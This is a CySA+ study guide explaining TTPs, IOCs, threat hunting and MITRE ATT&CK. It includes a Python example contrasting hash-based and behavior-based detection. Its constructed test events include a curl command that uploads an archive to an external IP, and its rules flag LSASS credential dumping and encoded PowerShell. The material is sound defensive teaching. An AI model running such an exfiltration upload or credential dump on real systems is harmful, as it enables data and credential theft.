1.4 Compare and contrast threat-intelligence and threat-hunting concepts.
📘CompTIA CySA+ (CS0-003)
1. What Are Tactics, Techniques, and Procedures (TTPs)?
TTPs describe how attackers operate.
They explain:
- What the attacker wants to achieve (Tactics)
- How they try to achieve it (Techniques)
- The exact steps or tools they use (Procedures)
Understanding TTPs helps security analysts:
- Detect attacks
- Investigate incidents
- Perform threat hunting
- Improve security controls
- Predict future attacks
For the CySA+ exam, you must clearly understand the difference between tactics, techniques, and procedures, and how they are used in threat intelligence and threat hunting.
2. Tactics
Definition
A tactic is the goal or objective of the attacker during a specific stage of an attack.
It answers the question:
“What is the attacker trying to accomplish right now?”
Tactics describe the high-level purpose of an attack phase.
Common Attacker Tactics
Some common tactics in cybersecurity include:
- Initial access
- Execution
- Persistence
- Privilege escalation
- Defense evasion
- Credential access
- Discovery
- Lateral movement
- Command and control (C2)
- Data exfiltration
- Impact (such as ransomware encryption)
IT Environment Example (Tactic)
If an attacker wants to:
- Gain administrator rights → Privilege escalation (tactic)
- Move from one compromised server to another → Lateral movement (tactic)
- Steal customer database files → Data exfiltration (tactic)
The tactic explains the attacker’s objective, not how they do it.
3. Techniques
Definition
A technique describes how the attacker achieves the tactic.
It answers:
“How does the attacker accomplish this goal?”
Techniques are more detailed than tactics but not as specific as procedures.
Example
If the tactic is:
Tactic: Credential Access
The attacker wants to steal login credentials.
Possible Techniques:
- Keylogging
- Credential dumping from memory
- Phishing emails
- Password spraying
- Brute force attacks
The technique explains the method category, not the exact command or tool used.
IT Environment Example
If attackers want to move laterally (tactic), they might use:
- Remote Desktop Protocol (RDP)
- Pass-the-hash
- SMB file sharing
Each one is a technique used to accomplish the lateral movement tactic.
4. Procedures
Definition
A procedure is the exact step-by-step method or specific tool the attacker uses.
It answers:
“Exactly how did the attacker perform this technique?”
Procedures are very specific and can include:
- Exact commands
- Malware names
- Scripts
- Exploit code
- Configuration changes
Example
If the technique is:
Technique: Credential Dumping
The procedure might be:
- Using a specific tool to dump LSASS memory
- Running a PowerShell command to extract credentials
- Uploading a specific malware file to a server
Procedures are the lowest level of detail in TTPs.
5. Simple Comparison Table
| Level | What It Means | Question It Answers | Example |
|---|---|---|---|
| Tactic | The attacker’s goal | What are they trying to achieve? | Privilege escalation |
| Technique | The method used | How are they doing it? | Exploiting a vulnerable service |
| Procedure | The exact implementation | Exactly how was it done? | Running a specific exploit script |
6. Why TTPs Are Important for CySA+
TTPs are critical in:
- Threat intelligence
- Threat hunting
- Incident response
- Detection engineering
- Building SIEM rules
- Writing playbooks
The CySA+ exam expects you to understand how TTPs help analysts detect and respond to threats.
7. TTPs in Threat Intelligence
What Is Threat Intelligence?
Threat intelligence is the collection and analysis of information about attackers, including:
- Indicators of compromise (IOCs)
- Malware signatures
- IP addresses
- Domains
- Attacker behavior patterns
TTPs are part of behavior-based intelligence.
TTPs vs IOCs
This is very important for the exam.
Indicators of Compromise (IOCs)
- Specific IP address
- Specific file hash
- Specific domain name
These are:
- Easy to detect
- Easy for attackers to change
TTPs
- Describe attacker behavior
- Harder to change
- More long-term intelligence
Example:
Even if an attacker changes:
- IP address
- Malware filename
- Domain
Their behavior pattern (TTP) may stay the same.
That makes TTPs more valuable for long-term defense.
8. TTPs in Threat Hunting
What Is Threat Hunting?
Threat hunting is a proactive search for threats inside a network.
Instead of waiting for alerts, analysts:
- Look for suspicious behavior
- Search logs
- Investigate anomalies
- Test hypotheses
How TTPs Are Used in Threat Hunting
Threat hunters use TTPs to:
- Build hypotheses
- Build hypotheses
  Example: “If attackers use credential dumping, there should be abnormal access to LSASS.”
- Search logs
  - Windows event logs
  - Endpoint logs
  - Network traffic logs
  - Firewall logs
- Detect suspicious behavior
  - Unusual PowerShell execution
  - Unexpected admin account usage
  - Large data transfers
TTPs guide hunters on what to look for.
9. TTPs and the MITRE ATT&CK Framework
The MITRE Corporation developed the MITRE ATT&CK framework.
This framework organizes:
- Tactics
- Techniques
- Sub-techniques
It is widely used in:
- Security Operations Centers (SOCs)
- Threat intelligence platforms
- Detection engineering
- Incident response teams
How MITRE ATT&CK Relates to TTPs
MITRE ATT&CK:
- Lists attacker tactics (e.g., Persistence)
- Lists techniques under each tactic
- Provides detection guidance
For the CySA+ exam, understand that:
MITRE ATT&CK is a knowledge base of attacker TTPs.
10. Behavioral Detection vs Signature Detection
Understanding this difference is very important for CySA+.
Signature-Based Detection
- Looks for known file hashes
- Looks for known malware names
- Based on IOCs
Weakness:
- Easily bypassed if the attacker changes the file name or hash.
Behavior-Based Detection
- Looks at TTPs
- Detects abnormal actions
- Detects suspicious system behavior
Example:
- A standard user account accessing domain controller memory
- A service account launching interactive shells
- A large data transfer to an unknown external IP
Behavior detection is based on TTPs and is stronger against modern threats.
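The following added example (not part of the original study notes) puts sections 8 and 10 side by side: an IOC-style detector that matches file hashes, and a TTP-style detector that looks at what a process does (LSASS access, encoded PowerShell, a large external transfer). All hashes, process names, the allowlist and the byte threshold are constructed for the example. Event 2 is the same tool renamed and recompiled, which evades the hash match but not the behavior rule.

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Constructed IOC feed: the hash of a credential-dumping tool seen earlier.
KNOWN_BAD_HASHES = {sha256_hex(b"constructed-dumper-build-1")}

# Constructed endpoint events, not real telemetry. Event 2 is the same tool
# renamed and recompiled: new name and hash, same behaviour.
EVENTS = [
    {"id": 1, "process": "dumper.exe", "sha256": sha256_hex(b"constructed-dumper-build-1"),
     "target": "lsass.exe", "cmdline": "", "bytes_out": 0, "dst": ""},
    {"id": 2, "process": "svchost_update.exe", "sha256": sha256_hex(b"constructed-dumper-build-2"),
     "target": "lsass.exe", "cmdline": "", "bytes_out": 0, "dst": ""},
    {"id": 3, "process": "powershell.exe", "sha256": sha256_hex(b"constructed-powershell"),
     "target": "", "cmdline": "powershell.exe -enc QUJD", "bytes_out": 0, "dst": ""},
    {"id": 4, "process": "curl.exe", "sha256": sha256_hex(b"constructed-curl"),
     "target": "", "cmdline": "curl.exe -T archive.zip https://203.0.113.7/up",
     "bytes_out": 850_000_000, "dst": "203.0.113.7"},
    {"id": 5, "process": "MsMpEng.exe", "sha256": sha256_hex(b"constructed-av"),
     "target": "lsass.exe", "cmdline": "", "bytes_out": 0, "dst": ""},
]

# Constructed allowlist of processes that legitimately open LSASS.
LSASS_ALLOWLIST = {"MsMpEng.exe", "csrss.exe", "wininit.exe"}
INTERNAL_PREFIXES = ("10.", "192.168.")
EXFIL_BYTES = 500_000_000  # constructed threshold for a "large" outbound transfer

def signature_detect(events):
    """IOC match: fires only when the exact file hash is already on the feed."""
    return {e["id"] for e in events if e["sha256"] in KNOWN_BAD_HASHES}

def behavior_detect(events):
    """TTP match: fires on what the process does, whatever it is named or hashes to."""
    hits = {}
    for e in events:
        reasons = []
        if e["target"] == "lsass.exe" and e["process"] not in LSASS_ALLOWLIST:
            reasons.append("credential_access:lsass_access")
        if e["process"].lower() == "powershell.exe" and " -enc" in e["cmdline"].lower():
            reasons.append("execution:encoded_powershell")
        if e["bytes_out"] >= EXFIL_BYTES and e["dst"] and not e["dst"].startswith(INTERNAL_PREFIXES):
            reasons.append("exfiltration:large_external_transfer")
        if reasons:
            hits[e["id"]] = reasons
    return hits
```

Running `signature_detect(EVENTS)` flags only event 1, while `behavior_detect(EVENTS)` flags events 1 through 4 and leaves the allowlisted antivirus process (event 5) alone.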
11. TTPs and Advanced Persistent Threats (APT)
Advanced attackers often:
- Reuse similar TTP patterns
- Follow similar attack chains
- Use consistent operational behavior
Even if tools change, their TTPs may remain similar.
Security analysts can:
- Attribute attacks
- Identify likely attacker groups
- Strengthen defenses
12. TTP Lifecycle in an IT Environment
In a typical enterprise network:
- Initial Access (Tactic)
  Technique: Phishing
  Procedure: Sending malicious document via email
- Execution (Tactic)
  Technique: PowerShell abuse
  Procedure: Running encoded PowerShell command
- Credential Access (Tactic)
  Technique: Memory dumping
  Procedure: Extracting credentials from LSASS
- Lateral Movement (Tactic)
  Technique: RDP
  Procedure: Using stolen admin credentials over RDP
- Exfiltration (Tactic)
  Technique: Data transfer over HTTPS
  Procedure: Uploading archive file to external server
This shows how tactics, techniques, and procedures connect together.
13. Exam Key Points (Very Important)
For the CySA+ exam, remember:
✅ Tactic = attacker goal
✅ Technique = method used
✅ Procedure = exact implementation
✅ TTPs describe behavior
✅ TTPs are harder to change than IOCs
✅ Threat intelligence uses TTPs to understand attackers
✅ Threat hunting uses TTPs to proactively search for threats
✅ MITRE ATT&CK organizes TTPs
✅ Behavior-based detection focuses on TTPs
✅ TTP analysis improves long-term defense
14. Common Exam Traps
Be careful not to confuse:
- IOC with TTP
- Technique with tactic
- Procedure with technique
- Signature-based detection with behavioral detection
If a question mentions:
- Specific IP address → IOC
- Attack goal → Tactic
- General method → Technique
- Specific command or tool → Procedure
15. Final Summary (Simple Version)
Think of TTPs like this:
- Tactic = The attacker’s goal
- Technique = The method used
- Procedure = The exact steps taken
TTPs are important because they:
- Help detect modern attacks
- Support threat hunting
- Improve incident response
- Provide long-term defense strategies
- Are organized in the MITRE ATT&CK framework
